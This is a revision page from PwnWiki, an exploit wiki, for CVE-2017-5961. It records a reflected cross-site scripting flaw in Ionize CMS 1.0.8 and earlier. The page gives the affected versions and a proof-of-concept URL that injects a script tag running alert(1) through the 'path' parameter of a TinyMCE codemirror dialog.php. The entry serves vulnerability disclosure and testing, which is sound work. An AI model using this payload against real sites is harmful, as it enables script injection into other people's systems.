Difference between revisions of "CVE-2017-5961 IonizeCMS XSS漏洞"
From PwnWiki
(Created page with "<languages /> <translate> ==漏洞影響== </translate> <=Ionize 1.0.8 ==POC== <pre> http://<target>/testcmsofgithub/ionize-master/ionize-master/themes/admin/javascript/tinym...") |
(Marked this version for translation) |
||
| Line 1: | Line 1: | ||
<languages /> | <languages /> | ||
<translate> | <translate> | ||
| − | ==漏洞影響== | + | ==漏洞影響== <!--T:1--> |
</translate> | </translate> | ||
<=Ionize 1.0.8 | <=Ionize 1.0.8 | ||
Latest revision as of 14:42, 10 July 2021
漏洞影響
<=Ionize 1.0.8
POC
http://<target>/testcmsofgithub/ionize-master/ionize-master/themes/admin/javascript/tinymce/jscripts/tiny_mce/plugins/codemirror/dialog.php?path=%22%3E%3C/script%3E%3Cscript%3Ealert(1);%3C/script%3E%3Cscript%20%22